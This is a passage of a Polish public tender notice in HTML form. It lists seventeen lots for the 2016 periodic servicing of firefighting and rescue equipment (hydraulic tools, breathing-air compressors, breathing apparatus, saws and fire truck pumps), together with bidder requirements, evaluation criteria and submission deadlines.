i zabrudzone czyściwa (o ile wystąpią dla danego zadania).
8.	Wykonawca udzieli gwarancji na wymienione elementy, materiały oraz wykonaną usługę:
1)	dla zadania nr: 1, 2, 6 (poz. nr 1), 7, 8, 9, 10, 11, 13, 14, 15, 16, 17- na okres 12 miesięcy.
2)	dla zadania nr: 3, 4, 5, 6 (poz. nr 3), 12 - na okres 6 miesięcy po pierwszym przeglądzie 
i 6 miesięcy po drugim przeglądzie.
od dnia protokolarnego przyjęcia sprzętu po wykonanej usłudze.
9.	Okres ważności przeglądu w danym zadaniu musi być zgodny z wymaganiami producenta sprzętu i obowiązującymi w tym zakresie normami (data przeglądu zostanie odnotowana w książce serwisowej sprzętu).
10.	Szczegółowy opis warunków realizacji przedmiotu zamówienia określają Ogólne Warunki Umowy. 
11.	Zakazuje się dokonywanie wizji lokalnej, zdjęć, nagrań, zbierania danych 
z wykorzystywaniem aparatów latających, w tym BSP typu Dron..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców składających ofertę wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 1 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionego oświadczenia jak powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 2 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionego oświadczenia jak powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 3 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionego oświadczenia jak powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 3 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionego oświadczenia jak powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 4 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionego oświadczenia jak powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art. 26 ust. 2b Ustawy) - w formie kopii dokumentów tych podmiotów poświadczonych za zgodność z oryginałem przez Wykonawcę lub te podmioty oraz przedłoży wykaz tych podmiotów. 
Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy - art. 36a ustawy PZP.W przypadku gdy Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcy winien w ofercie wskazać części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. 
lub / i
Zamawiający żąda podania przez Wykonawcę nazw (firm) podwykonawców, w sytuacji gdy Wykonawca powołuje się na zasoby tych podwykonawców  na zasadach określonych 
w art. 26 ust. 2b, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1.
W przypadku, gdy Wykonawca nie wskaże w ofercie części zamówienia, której wykonanie powierzy podwykonawcom Zamawiający  uzna, że całość zamówienia wykona samodzielnie. Wykonawca wraz z ofertą winien przedłożyć:Formularz ofertowy; Oświadczenie o spełnieniu warunków udziału; Oświadczenie o braku podstaw do  wykluczenia z postępowania;  Wykaz części zamówienia, które Wykonawca zamierza powierzyć do realizacji  podwykonawcy;Informacja o Wykonawcy; Oświadczenie o przynależności / bądź nie przynależności do grupy kapitałowej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 Ustawy przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w następującym zakresie:
1)	udziału podwykonawcy na etapie realizacji umowy w sytuacji, gdy Wykonawca nie przewidział jego udziału w treści oferty lub zmiany podwykonawcy na innego 
- w przypadku, kiedy Wykonawca określi go co do tożsamości w ofercie a nowy podwykonawca spełni wymagania dla fachowego wykonania powierzanych mu czynności lub części zamówienia zgodnie z umową (np. oświadczenie Wykonawcy, podwykonawcy);
2)	zmiany zakresu podwykonawstwa;
3)	zmiany podwykonawcy na innego lub rezygnacji z podwykonawcy uczestniczącego 
w realizacji umowy w sytuacji gdy wykonawca na etapie składania ofert wykazał podwykonawcę jako podmiot, na którego zasoby wykonawca powołał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1. Wykonawca w tej sytuacji będzie zobowiązany udowodnić  Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagane w trakcie postępowania o udzielenie zamówienia;
4)	terminu (wykonania czynności) określonego w Rozdziale III ust. 3 SIWZ, w przypadku zaistnienia po stronie Zamawiającego okoliczności uniemożliwiających wykonanie usługi,  nie powstałych z winy Zamawiającego, z zastrzeżeniem zachowania ostatecznego terminu 30.11.2016 r. 
Zmiany w pkt 1-3 wymagają zachowania formy pisemnej (aneks) oraz pisemnego wniosku jednej ze Stron o zmianę wraz z uzasadnieniem.

O zmianie, o której mowa w pkt 4) Zamawiający powiadomi Wykonawcę na piśmie z co najmniej dwudniowym wyprzedzeniem.
Rozdział V</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.13wog.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> z kasy 13WOG ul. Czwartaków 3,86-300 Grudziądz:3zł, na wniosek Wykonawcy -wysyłka: 7,68 zł lub bezpłatnie z www.13wog.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.04.2016 godzina 09:30, miejsce: kancelaria 13WOG ul.Czwartaków 3 86-300 Grudziądz (pom.7 bud. 1)-osobiście lub przesyłka, wykonawca uwzględnia czas niezbędny na dostarczenie oferty bezpośrednio do kancelarii.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kopertę należy opisać hasłem: 
PRZEGLĄDY OKRESOWE SPRZĘTU POŻARNICZEGO - sprawa nr 26/2016
nie otwierać do dnia 13.04.2016 r. g. 10.00. Na kopercie umieścić należy w postaci pieczęci firmowej lub odręcznego napisu, nazwę Wykonawcy i jego adres zgodnie z danymi rejestrowymi (ewidencyjnymi). Konsekwencje złożenia oferty niezgodnie z opisem (np. potraktowanie oferty jako zwykłej korespondencji i niedostarczenie jej na miejsce składania ofert w terminie jak w powyżej) ponosi Wykonawca..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1: Przegląd zestawów narzędzi hydraulicznych Holmatro-DPU 62D25- 1 zest.;   2060 PU Core- 1 zest;    DPU 61P20- 1 zest. ;   DPU 60P - 1 zest..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Zadanie nr 1: Przegląd zestawów narzędzi hydraulicznych Holmatro-DPU 62D25- 1 zest.;   2060 PU Core - 1 zest;    DPU 61P20- 1 zest. ;   DPU 60P - 1 zest.
Nazwa czynności	
- wymiana filtrów powietrza
- wymiana świec zapłonowych
- sprawdzenie układu rozruchu  silnika          
- sprawdzenie parametrów pracy silnika
- sprawdzenie szczelności zwijadeł
- sprawdzenie szczelności przyłączy kości zwijadeł
- sprawdzenie szczelności króćca zaworu
- sprawdzenie szczelności kości przyłącza
- sprawdzenie szczelności szybkozłącza pompy
- sprawdzenie szczelności szybkozłączy narzędzi
- sprawdzenie szczelności i działania zaworu bezpieczeństwa
- sprawdzenie ciśnienia maksymalnego
- sprawdzenie sił nacisku i rozwarcia narzędzi
- wymiana oleju hydraulicznego 	

Ilość czynności w roku: raz w roku: wrzesień 	
Ilość zestawów ogółem: 4 zestawy

ZESTAW:	
Holmatro - DPU 62P25 - 1 zestaw	MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja
2060 PU Core - 1 zestaw	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
DPU 61 P20	- 1 zestaw	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
DPU 60P Core - 1 zestaw MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2: Przegląd okresowy pompy Lukas P-620 SG i narzędzi hydraulicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2: Przegląd okresowy pompy Lukas P-620 SG i narzędzi hydraulicznych
Nazwa czynności	
- wymiana filtrów powietrza
- wymiana świec zapłonowych 
- sprawdzenie układu rozruchu silnika           
- sprawdzenie parametrów pracy silnika
- sprawdzenie szczelności zwijadeł
- sprawdzenie szczelności przyłączy kości zwijadeł
- sprawdzenie szczelności króćca zaworu
- sprawdzenie szczelności kości przyłącza
- sprawdzenie szczelności szybkozłącza pompy
- sprawdzenie szczelności szybkozłączy narzędzi
- sprawdzenie szczelności zaworu bezpieczeństwa
- sprawdzenie ciśnienia maksymalnego
- sprawdzenie sił nacisku i rozwarcia narzędzi
- wymiana oleju hydraulicznego	

Ilość czynności w roku:	raz w roku:lipiec 	
Ilość zestawów ogółem: 1 zestaw

ZESTAW:	
pompa Lukas P-620 SG i narzędzia hydrauliczne	- 1 zestaw	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3: Przegląd okresowy kompresorów elektrycznych do ładowania butli aparatów powietrznych   
Nazwa czynności.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3: Przegląd okresowy kompresorów elektrycznych do ładowania butli aparatów powietrznych   
Nazwa czynności	
- wymiana filtra oczyszczania powietrza 
- wymiana filtra wstępnego powietrza 
- wymiana oleju 
- sprawdzenie działania zaworu bezpieczeństwa
- sprawdzenie czystości powietrza zgodnie z normą PN-EN 12021
- dokonanie przeglądu  poprawności działania przyrządów pomiarowych 
- wymiana paska napędowego	
Ilość czynności w roku: dwa razy w roku:maj, listopad 	
Ilość sprzętu ogółem: 4 szt.
SPRZĘT	
COLTRI MCH-6 ETC - 2 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
COLTRI MCH-6 EM - 1 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
CTC 100 - GX 160 - 1 szt.	MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4: Przegląd okresowy kompresora elektrycznego do ładowania butli aparatów powietrznych MSA 100 EFI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4: Przegląd okresowy kompresora elektrycznego do ładowania butli aparatów powietrznych MSA 100 EFI

Nazwa czynności	
-wymiana filtra oczyszczania powietrza 
-wymiana filtra wstępnego powietrza
-wymiana oleju  
-sprawdzenie działania zaworu bezpieczeństwa
-sprawdzenie czystości  powietrza zgodnie z normą  PN-EN 12021
-dokonanie przeglądu  poprawności działania przyrządów pomiarowych
-sprawdzenie zaworów ssąco- tłoczących z wymianą    
-uszczelnienia         	

Ilość czynności w roku: dwa razy w roku: maj, listopad 	
Ilość sprzętu ogółem:1 szt.

SPRZĘT	
MSA 100 EFI - 1 szt.	MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5: Przegląd okresowy kompresora elektrycznego do ładowania butli aparatów powietrznych Bauer Posejdon PE 3000-TE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5: Przegląd okresowy kompresora elektrycznego do ładowania butli aparatów powietrznych Bauer Posejdon PE 3000-TE
Nazwa czynności	
-wymiana filtra oczyszczania powietrza
-wymiana filtra wstępnego powietrza
-wymiana oleju
-sprawdzenie działania zaworu bezpieczeństwa
-sprawdzenie czystości powietrza zgodnie z normą PN-EN 12021
-dokonanie przeglądu poprawności działania przyrządów pomiarowych           
-wymiana paska napędowego 
-wymiana pakietu naprawczego  po 500 godz. pracy  (lub po przepracowaniu pierwszego roku pracy)	
Ilość czynności w roku: 	
dwa razy 
w roku:
maj, listopad 	
Ilość sprzętu ogółem: 1 szt.

SPRZĘT:	
kompresor elektryczny do ładowania butli aparatów powietrznych -   Bauer Posejdon PE 3000-TE - 1 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6: Przegląd okresowy aparatów powietrznych nadciś. 1 butl. -  FENZY, masek aparatów oraz  butli kompozytowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 6: Przegląd okresowy aparatów powietrznych nadciś. 1 butl. -  FENZY, masek aparatów oraz  butli kompozytowych

Nazwa czynności	
1. Wymiana pakietu legalizacyjnego                                
Zakres wymiany :    
-sprężyna zaworu wydechowego
-membrana zaworu wydechowego                                    
-uszczelka zaworu air klik,                         
-membrana foniczna,                   
-uszczelka membrany fonicznej	
Ilość czynności w roku	raz w roku:maj	Ilość: 41 zestawów                  
2.	Legalizacja  UDT butli kompozytowych 6,8 l. 300 bar
Zakres czynności:
-odkręcenie zaworu, czyszczenie i dezynfekcja butli
-przeprowadzenie hydrostatycznego testu ciśnieniowego 450 bar
-odbiór przez UDT
-skręcenie zaworu i napełnienie  atestowanym powietrzem  oddechowym	
Ilość czynności w roku	raz w roku:maj (usługa w siedzibie Wykonawcy)	Ilość 60 szt.
3.	Przegląd  okresowy kompletnego aparatu powietrznego obejmujący następujące czynności:                                 
- sprawdzenie szczelności,
- dynamiczny test na sztucznym płucu                   
- konserwacja                                          
- dezynfekcja ,  
- kontrola końcowa,   
- dopuszczenie do użytku,             
- wpis  do książki paszportowej.	
Ilość czynności w roku	dwa razy w roku:maj, listopad	 Ilość: 41 zestawów

SPRZĘT:	
aparaty powietrzne nadciś. FENZY AERIS, maski aparatów - 41 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
Legalizacja UDT butli kompozytowych - 60 szt.	MIEJSCE WYKONANIA USŁUGI: w siedzibie Wykonawcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7: Przegląd okresowy pił spalinowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 7: Przegląd okresowy pił spalinowych
Nazwa czynności	
-wymiana filtra powietrza
-wymiana świec zapłonowych 
-sprawdzenie działania układu rozruchowego silnika
-sprawdzenie parametrów pracy silnika
-sprawdzenie działania hamulca bezpieczeństwa
-wymiana smoczka 
-ostrzenie łańcucha
-regulacja naciągu łańcucha
-regulacja pracy silnika	
Ilość czynności w roku: raz w roku:sierpień 	

Ilość sprzętu ogółem: 16 szt.

SPRZĘT	
MS-290	14 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
MS-290	2 szt.	MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8: Przegląd okresowy przecinarek spalinowych do stali i betonu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 8: Przegląd okresowy przecinarek spalinowych do stali i betonu    
Nazwa czynności	
-wymiana filtra powietrza
-wymiana świec zapłonowych
-sprawdzenie działania układu rozruchowego silnika
-sprawdzenie parametrów pracy silnika
-sprawdzenie działania hamulca bezpieczeństwa
-wymiana smoczka
-wymiana paska klinowego
-sprawdzenie mocowania tarczy tnącej
-regulacja pracy silnika 	

Ilość czynności w roku	raz w roku:sierpień 	
Ilość sprzętu ogółem: 10 szt.

SPRZĘT	
TS-400	5 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
TS-800	3 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
TS-400	2 szt.	MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren 
1 RBLog - Skład Gardeja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia w okolicznościach, o których mowa w § 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9: Przegląd okresowy autopompy i układu wodno pianowego w samochodach pożarniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 9: Przegląd okresowy autopompy i układu wodno pianowego w samochodach pożarniczych
Nazwa czynności	
-sprawdzenie szczelności autopompy
-przegląd autopompy - smarowanie
-przegląd skrzyni napędowej autopompy
-przegląd wału napędowego autopompy
-przegląd urządzenia zasysającego
-przegląd zaworu głównego
-przegląd zaworów tłocznych
-przegląd manometrów i manowakuometrów
-sprawdzenie instalacji elektrycznej i automatyki sterowania autopompy
-próba sprawności podzespołów wodno-pianowych ,ciśnienia i wydajności autopompy,
-dokonanie przeglądu poprawności działania przyrządów pomiarowych	

Ilość czynności w roku	raz w roku:sierpień 	
Ilość sprzętu ogółem: 12 szt.
Uwaga!  Dodatkowo w nw pojazdach należy dokonać następujących czynności: 
Scania G440 CB
- wymiany oleju w trokomacie
